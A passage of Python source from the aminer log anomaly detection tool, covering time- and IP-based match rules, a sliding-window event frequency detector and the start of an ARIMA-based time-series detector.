"seconds_modulo must be bigger than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(lower_limit, bool) or not isinstance(lower_limit, int): msg = "lower_limit has to be of type int." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(upper_limit, bool) or not isinstance(upper_limit, int): msg = "upper_limit has to be of type int." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if lower_limit >= upper_limit: msg = "lower_limit must be smaller than upper_limit." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if lower_limit < 0: msg = "lower_limit must be greater than or equal zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if upper_limit <= 0: msg = "upper_limit must be greater than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if upper_limit > seconds_modulo: msg = "upper_limit can not be greater than seconds_modulo." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(self.tzinfo, timezone): msg = "tzinfo has to be of type datetime.timezone." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 test_value = None if self.target_path is None: test_value = log_atom.get_timestamp() else: time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if time_match is None: return False test_value = time_match.match_object + datetime.now(self.tzinfo).utcoffset().total_seconds() if test_value is None: return False test_value %= self.seconds_modulo if self.lower_limit <= test_value <= self.upper_limit: if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False class ValueDependentModuloTimeMatchRule(MatchRule): """Match elements of this class return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 rom that date modulo the given value are included in a [lower, upper] range selected by values from the match. """ def __init__(self, target_path, seconds_modulo, target_path_list=None, limit_lookup_dict=None, default_limit=None, match_action=None, tzinfo=None): """ @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None, the default timestamp associated with the match is used. @param default_limit use this default limit when limit lookup failed. Without a default limit, a failed lookup will cause the rule not to match. """ self.target_path = target_path self.seconds_modulo = seconds_modulo self.target_path_list = target_path_list self.limit_lookup_dict = limit_lookup_dict self.default_limit = default_limit self.match_action = match_action self.tzinfo = tzinfo if tzinfo is None: self.tzinfo = datetime.now(timezone.utc).astimezone().tzinfo if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(seconds_modulo, bool) or not isinstance(seconds_modulo, int): msg = "seconds_modulo has to be of type int." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if seconds_modulo <= 0: msg = "seconds_modulo must be bigger than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if target_path_list is not None and (not isinstance(target_path_list, list) or not all(isinstance(x, str) and len(x) > 0 for x in target_path_list)): msg = "target_path_list has to be a list of strings." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if limit_lookup_dict is not None and ( not isinstance(limit_lookup_dict, dict) or None in limit_lookup_dict.keys() or not all(isinstance(x, list) and all(not isinstance(y, bool) and isinstance(y, (int, float)) for y in x) and len(x) == 2 and x[0] < x[1] <= seconds_modulo for x in limit_lookup_dict.values())): msg = "limit_lookup_dict has to be of type dict with a list of two integer or float limit values as values. " \ "The first limit value must be smaller than the second and both must be smaller than seconds_modulo." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_limit is not None and ( not isinstance(default_limit, list) or not all(not isinstance(x, bool) and isinstance(x, (int, float)) for x in default_limit) or len(default_limit) != 2 or default_limit[0] > default_limit[1] or default_limit[1] > seconds_modulo): msg = "default_limit has to be a list with two integer or float limit values. The first value must be smaller than the " \ "second and both must be smaller than seconds_modulo." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_limit is None and (not limit_lookup_dict or not target_path_list): msg = "Either default_limit or limit_lookup_dict and target_path_list must not be None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(self.tzinfo, timezone): msg = "tzinfo has to be of type datetime.timezone." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() value_list = [] for path in self.target_path_list: value_element = match_dict.get(path) if value_element is not None: value_list.append(value_element.match_object) if len(value_list) > 0: value = value_list[0] else: value = None limits = self.limit_lookup_dict.get(value, self.default_limit) if limits is None: return False if self.target_path is None: test_value = log_atom.get_timestamp() else: time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if time_match is None: return False test_value = time_match.match_object + datetime.now(self.tzinfo).utcoffset().total_seconds() test_value %= self.seconds_modulo if limits[0] <= test_value <= limits[1]: if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False class IPv4InRFC1918MatchRule(MatchRule): """Match elements of this class return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges. This could also be done by distinct range match elements, but as this kind of matching is common, have an own element for it. """ def __init__(self, target_path, match_action=None): self.target_path = target_path self.match_action = match_action if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 match_element = log_atom.parser_match.get_match_dictionary().get(self.target_path) if (match_element is None) or not isinstance(match_element.match_object, int): return False value = match_element.match_object if ((value & 0xff000000) == 0xa000000) or ((value & 0xfff00000) == 0xac100000) or ((value & 0xffff0000) == 0xc0a80000): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f"hasPath({self.target_path})" class DebugMatchRule(MatchRule): """This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match result is returned. """ def __init__(self, debug_match_result=False, match_action=None): self.debug_match_result = debug_match_result self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 print(f'Rules.DebugMatchRule: triggered while handling "{repr(log_atom.parser_match.match_element.match_string)}"', file=sys.stderr) if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return self.debug_match_result def __str__(self): return f"{self.debug_match_result}" class DebugHistoryMatchRule(MatchRule): """This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just adds the evaluated log_atom to a ObjectHistory. """ def __init__(self, object_history=None, debug_match_result=False, match_action=None): """Create a DebugHistoryMatchRule object. @param object_history use this ObjectHistory to collect the LogAtoms. When None, a default LogarithmicBackoffHistory for 10 items. """ if object_history is None: object_history = LogarithmicBackoffHistory(10) elif not isinstance(object_history, ObjectHistory): msg = "object_history is not an instance of ObjectHistory" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.object_history = object_history self.debug_match_result = debug_match_result self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 self.object_history.add_object(log_atom) if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return self.debug_match_result def get_history(self): """Get the history object from this debug rule.""" return self.object_history SlidingEventFrequencyDetector.py000066400000000000000000000417701500476301700373010ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for event and value frequency exceedances with a sliding window approach. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from collections import deque from aminer.events.EventInterfaces import EventSourceInterface from aminer.AminerConfig import STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, DEBUG_LOG_NAME from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface class SlidingEventFrequencyDetector(AtomHandlerInterface, EventSourceInterface): """This class creates events when event or value frequencies exceed the set limit.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, set_upper_limit, target_path_list=None, scoring_path_list=None, window_size=600, local_maximum_threshold=0.2, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. @param window_size the length of the time window for counting in seconds. @param set_upper_limit sets the upper limit of the frequency test to the specified value. @param local_maximum_threshold sets the threshold for the detection of local maxima in the frequency analysis. A local maximum occurs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit. @param persistence_id name of persistence document. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. """ # Avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, window_size=window_size, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, scoring_path_list=scoring_path_list, set_upper_limit=set_upper_limit, local_maximum_threshold=local_maximum_threshold, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not self.set_upper_limit: msg = "set_upper_limit must not be None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.counts = {} self.scoring_value_list = {} self.max_frequency = {} self.max_frequency_time = {} self.max_frequency_log_atom = {} self.ranges = {} self.exceeded_frequency_range = {} self.exceeded_frequency_range_time = {} def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the " + str(self.__class__.__name__) + ".") self.learn_mode = False parser_match = log_atom.parser_match self.log_total += 1 # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False # Get the log event and save it in log_event if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # Initialize the needed variables at first event occurrence if log_event not in self.counts: # Initialize counts, max_frequency, max_frequency_time exceeded_frequency_range and self.exceeded_frequency_range_time self.counts[log_event] = deque() self.max_frequency[log_event] = 0 self.max_frequency_time[log_event] = 0 self.max_frequency_log_atom[log_event] = None self.exceeded_frequency_range[log_event] = False self.exceeded_frequency_range_time[log_event] = 0 # Initialize the list for the scoring output if scoring_path_list is set if len(self.scoring_path_list) > 0: self.scoring_value_list[log_event] = deque() # Append current time to the counts list self.counts[log_event].append(log_atom.atom_time) # Get the id list if the scoring_path_list is set and save it for the anomaly message if len(self.scoring_path_list) > 0: for scoring_path in self.scoring_path_list: scoring_match = log_atom.parser_match.get_match_dictionary().get(scoring_path) if scoring_match is not None: # Get the value of the current path if isinstance(scoring_match.match_object, bytes): scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING) else: scoring_value = scoring_match.match_object # Save the value in the list if log_event in self.counts: self.scoring_value_list[log_event].append(scoring_value) else: self.scoring_value_list[log_event] = [scoring_value] # Get current frequency current_frequency = self.get_current_frequency(log_atom, log_event) # Save the current frequency and time if it exceeded the max_frequency if current_frequency >= self.set_upper_limit and current_frequency >= self.max_frequency[log_event]: self.max_frequency[log_event] = current_frequency self.max_frequency_time[log_event] = log_atom.atom_time self.max_frequency_log_atom[log_event] = log_atom # Reset counter self.reset_counter(log_atom, log_event) # Check if the frequency exceeded the upper limit for the first time if not self.exceeded_frequency_range[log_event] and current_frequency > self.set_upper_limit: # Print anomaly message if the last exceeding anomaly lies more than one time window in the past. if self.exceeded_frequency_range_time[log_event] + self.window_size < log_atom.atom_time: self.print(log_event, current_frequency, first_exceeded_threshold=True) self.exceeded_frequency_range_time[log_event] = log_atom.atom_time # Reset exceeded_frequency_range self.exceeded_frequency_range[log_event] = True # Check if the previous max_frequency is a local maximum # A local maximum is assumed if it lies one time window in the past, the frequency returned into the interval, or # if the maximum of the anomaly is higher than local_maximum_threshold times the upper limit elif self.exceeded_frequency_range[log_event] and ( self.max_frequency_time[log_event] + self.window_size < log_atom.atom_time or current_frequency <= self.set_upper_limit or current_frequency < self.max_frequency[log_event] - self.local_maximum_threshold * self.set_upper_limit): # Print anomaly message self.print(log_event, self.max_frequency[log_event], first_exceeded_threshold=False) # Reset max frequency and counter self.max_frequency[log_event] = 0 self.max_frequency_time[log_event] = 0 self.max_frequency_log_atom[log_event] = None self.reset_counter(log_atom, log_event) # Reset variable exceeded_frequency_range if the current frequency is lower or equal to the upper limit if current_frequency <= self.set_upper_limit: self.exceeded_frequency_range[log_event] = False return True def print(self, log_event, frequency, first_exceeded_threshold=False): """Sends an event to the listeners. The event can be the first exceeding of the limits or a local maximum """ try: data = self.max_frequency_log_atom[log_event].raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.max_frequency_log_atom[log_event].raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [self.max_frequency_log_atom[log_event].parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(log_event)} frequency_info = {"ExpectedLogAtomValuesFrequencyRange": [0, self.set_upper_limit], "LogAtomValuesFrequency": frequency, "WindowSize": self.window_size } if not first_exceeded_threshold: # Calculate the confidence value frequency_info["Confidence"] = 1 - self.set_upper_limit / frequency # Local maximum timestamp frequency_info["Local_maximum_timestamp"] = round(self.max_frequency_time[log_event], 2) # In case that scoring_path_list is set, give their values to the event handlers for further analysis. if len(self.scoring_path_list) > 0: frequency_info["IdValues"] = list(self.scoring_value_list[log_event])[:self.max_frequency[log_event]] event_data = {"AnalysisComponent": analysis_component, "FrequencyData": frequency_info} if first_exceeded_threshold: message = "Frequency exceeds range for the first time" else: message = "Frequency anomaly detected" for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.max_frequency_log_atom[log_event], self) def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 def reset_counter(self, log_atom, log_event): """Remove any times from counts and scoring_value_list that fell out of the time window.""" while len(self.counts[log_event]) > 0 and self.counts[log_event][0] < log_atom.atom_time - self.window_size: self.counts[log_event].popleft() if len(self.scoring_path_list) > 0 and len(self.scoring_value_list[log_event]) > 0: self.scoring_value_list[log_event].popleft() def get_current_frequency(self, log_atom, log_event): """Return current frequency of the current log event.""" return len([None for timestamp in self.counts[log_event] if timestamp >= log_atom.atom_time - self.window_size]) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def get_weight_analysis_field_path(self): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" if self.scoring_path_list: return ["FrequencyData", "IdValues"] return [] def get_weight_output_field_path(self): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" if self.scoring_path_list: return ["FrequencyData", "Scoring"] return [] TSAArimaDetector.py000066400000000000000000001125231500476301700344200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module is a detector which uses a tsa-arima model to track appearance frequencies of events. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import copy import math from aminer import AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, \ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil import numpy as np from statsmodels.tsa.arima.model import ARIMA from statsmodels.tsa.stattools import acf from scipy.signal import savgol_filter class TSAArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class is used for an arima time series analysis of the appearances of log lines to events.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, waiting_time=1000, num_sections_waiting_time=100, acf_pause_interval_percentage=0.2, acf_auto_pause_interval=True, acf_auto_pause_interval_num_min=10, build_sum_over_values=False, num_periods_tsa_ini=15, num_division_time_step=10, alpha=0.05, num_min_time_history=20, num_max_time_history=30, num_results_bt=15, alpha_bt=0.05, acf_threshold=0.2, round_time_interval_threshold=0.02, force_period_length=False, set_period_length=604800, min_log_lines_per_time_step=10, persistence_id="Default", target_path_list=None, ignore_list=None, output_logline=True, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of events in the time windows. @param acf_pause_interval_percentage states which area of the results of the ACF are not used to find the highest peak. @param acf_auto_pause_interval states if the pause area is automatically set. If enabled, the variable acf_pause_interval_percentage loses its functionality. @param acf_auto_pause_interval_num_min states the number of values in which a local minima must be the minimum, to be considered a local minimum of the function and not an outlier. @param build_sum_over_values states if the sum of a series of counts is build before applying the TSA. @param num_periods_tsa_ini number of periods used to initialize the Arima-model. @param num_division_time_step number of division of the time window to calculate the time step. @param alpha significance level of the estimated values. @param num_min_time_history number of lines processed before the period length is calculated. @param num_max_time_history maximum number of values of the time_history. @param num_results_bt number of results which are used in the binomial test. @param alpha_bt significance level for the bt test. @param round_time_interval_threshold threshold for the rounding of the time_steps to the times in self.assumed_time_steps. The higher the threshold the easier the time is rounded to the next time in the list. @param acf_threshold threshold, which has to be exceeded by the highest peak of the cdf function of the time series, to be analyzed. @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. @param set_period_length states how long the period length is if force_period_length is set to True. @param min_log_lines_per_time_step states the minimal average number of log lines per time step to make a TSA. @param persistence_id name of persistence file. @param target_path_list At least one of the parser paths in this list needs to appear in the event to be analyzed. @param waiting_time in seconds, until the time windows are being initialized. @param num_sections_waiting_time Number of sections of the initialization window. The length of the input-list of the calculate_time_steps is this number. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "ignore_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, acf_pause_interval_percentage=acf_pause_interval_percentage, acf_auto_pause_interval=acf_auto_pause_interval, acf_auto_pause_interval_num_min=acf_auto_pause_interval_num_min, build_sum_over_values=build_sum_over_values, num_periods_tsa_ini=num_periods_tsa_ini, num_division_time_step=num_division_time_step, alpha=alpha, num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history, num_results_bt=num_results_bt, alpha_bt=alpha_bt, acf_threshold=acf_threshold, round_time_interval_threshold=round_time_interval_threshold, force_period_length=force_period_length, set_period_length=set_period_length, min_log_lines_per_time_step=min_log_lines_per_time_step, waiting_time=waiting_time, num_sections_waiting_time=num_sections_waiting_time, persistence_id=persistence_id, target_path_list=target_path_list, ignore_list=ignore_list, output_logline=output_logline, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) # Add the TSAArimaDetector-module to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # List ot the time trigger. The first list states the times when something should be triggered, the second list states the indices # of the event types, or a list of the event type, a path and a value which should be counted (-1 for an initialization) # the third list states, the length of the time step (-1 for a one time trigger) self.time_trigger_list = [[], [], []] self.num_event_lines_ref = [] # Reference containing the number of lines of the events for the TSA self.time_window_history = [] # History of the time windows self.arima_models = [] # List of the single arima_models (statsmodels) self.prediction_history = [] # List of the observed values and the predictions of the TSAArima self.time_history = [] # List of the times of the observations self.result_list = [] # List of results if the value was in the limits of the one-step predictions # Minimal number of successes for the binomial test self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt) # Assumed occurring time steps in seconds. 1 minute: 60, 1 hour: 3600, 12 hours: 43200, 1 day: 86400, 1 week: 604800. self.assumed_time_steps = [60, 3600, 43200, 86400, 604800] self.test_pause = None self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive the atom and return True. The log_atom doesn't need to be analyzed, because the counting and calls of the predictions is performed by the ETD. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Check if TSA should be initialized if -1 in self.time_trigger_list[0]: for i, val in enumerate(self.time_trigger_list[0]): if val == -1: # Initialize triggers for the time windows of the trainings phase for j in range(1, self.num_sections_waiting_time): self.time_trigger_list[0].append(log_atom.atom_time + self.waiting_time * j / ( self.num_sections_waiting_time)) self.time_trigger_list[1].append(-1) self.time_trigger_list[2].append(-1) self.time_trigger_list[0][i] = log_atom.atom_time + self.waiting_time # Save the current event lines count self.num_event_lines_ref = [[num] for num in self.event_type_detector.num_event_lines] break # Check if a trigger was triggered if len(self.time_trigger_list[0]) > 0 and any(log_atom.atom_time >= x for x in self.time_trigger_list[0]): # Get the indices of the triggered events indices = [i for i, time_trigger in enumerate(self.time_trigger_list[0]) if log_atom.atom_time >= time_trigger] # Execute the triggered functions of the TSA for i in range(len(indices)-1, -1, -1): # Checks if trigger is part of the initialisation if self.time_trigger_list[1][indices[i]] == -1 and self.time_trigger_list[2][indices[i]] == -1: # Save the number of occurred event types for the initialization of the TSA if self.num_event_lines_ref == [] or len( self.num_event_lines_ref[0]) < self.num_sections_waiting_time: # Expand the lists of self.num_event_lines_ref for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)): self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0])) # Add the current number of event lines for j, val in enumerate(self.event_type_detector.num_event_lines): self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j])) # Delete the initialization trigger del self.time_trigger_list[0][indices[i]] del self.time_trigger_list[1][indices[i]] del self.time_trigger_list[2][indices[i]] # Initialize the trigger for the time steps else: # Expand the lists of self.num_event_lines_ref for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)): self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0])) # Add the current number of eventlines for j, val in enumerate(self.event_type_detector.num_event_lines): self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j])) # Get the time step lengths. The first entry of the num_event_lines_ref states the number of log lines before the # initialization and is therefore excluded time_list = self.calculate_time_steps([val[1:] for val in self.num_event_lines_ref], log_atom) self.num_event_lines_ref = copy.copy(self.event_type_detector.num_event_lines) num_added_trigger = 0 # Add the new triggers for j, val in enumerate(time_list): if val != -1: num_added_trigger += 1 self.time_trigger_list[0].append(self.time_trigger_list[0][indices[i]] + val) self.time_trigger_list[1].append(j) self.time_trigger_list[2].append(val) # Delete the initialization trigger del self.time_trigger_list[0][indices[i]] del self.time_trigger_list[1][indices[i]] del self.time_trigger_list[2][indices[i]] # Run the update function for all trigger, which would already have been triggered for k in range(1, num_added_trigger+1): while log_atom.atom_time >= self.time_trigger_list[0][-k]: self.test_num_appearance(self.time_trigger_list[1][-k], self.event_type_detector.num_event_lines[ self.time_trigger_list[1][-k]] - self.num_event_lines_ref[ self.time_trigger_list[1][-k]], log_atom) self.time_trigger_list[0][-k] += self.time_trigger_list[2][-k] self.num_event_lines_ref[self.time_trigger_list[1][-k]] = self.event_type_detector.num_event_lines[ self.time_trigger_list[1][-k]] # Trigger for a reoccurring time step else: while log_atom.atom_time >= self.time_trigger_list[0][indices[i]]: self.test_num_appearance(self.time_trigger_list[1][indices[i]], self.event_type_detector.num_event_lines[ self.time_trigger_list[1][indices[i]]]-self.num_event_lines_ref[ self.time_trigger_list[1][indices[i]]], log_atom) self.time_trigger_list[0][indices[i]] += self.time_trigger_list[2][indices[i]] self.num_event_lines_ref[self.time_trigger_list[1][indices[i]]] = self.event_type_detector.num_event_lines[ self.time_trigger_list[1][indices[i]]] return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, [self.time_window_history, self.prediction_history, self.time_history, self.result_list, self.time_trigger_list, 